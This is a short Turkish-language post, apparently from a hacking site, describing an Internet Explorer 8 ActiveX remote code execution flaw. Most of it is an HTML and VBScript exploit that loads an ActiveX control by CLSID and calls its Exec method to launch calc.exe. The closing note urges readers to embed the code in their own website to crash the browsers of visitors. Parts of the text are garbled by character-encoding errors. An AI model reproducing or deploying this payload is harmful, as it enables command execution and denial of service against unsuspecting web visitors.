IE 8 ActiveX Remote Code Excution Açığı
Risk: Yüksek
Etki: Activex denetimleri bozarak Explorer’ın tampon bellek taÅŸmasına neden olması
Etkilenenler: Internet Explorer 8 – OS: XP, Vista, Windows 7
Exploit (Code):
<html>
<p align=”left”><b><font face=”SegoeScript”
size=”7″> &am
p;nbsp; &nbs
p; &am
p;nbsp;
&
nbsp;
</font></b></p>
<p>
<object classid=’clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8′ id=’target’
></object>
<script language=’vbscript’>
arg1=”c:WINDOWSsystem32calc.exe”
target.Exec arg1
</script></p>
Not: Yukarıdaki kodu direk olarak Web sitenizin bir bölümünde HTML olarak gömüp sayfanıza girip çıkanların ActiveX’ine eziyet çektirebilirsiniz. Internet Explorer 8 bir süre kasılıyor, tampon bellekte aktarım sorunlar yaşıyor ve çalışmaz hale geliyor.



















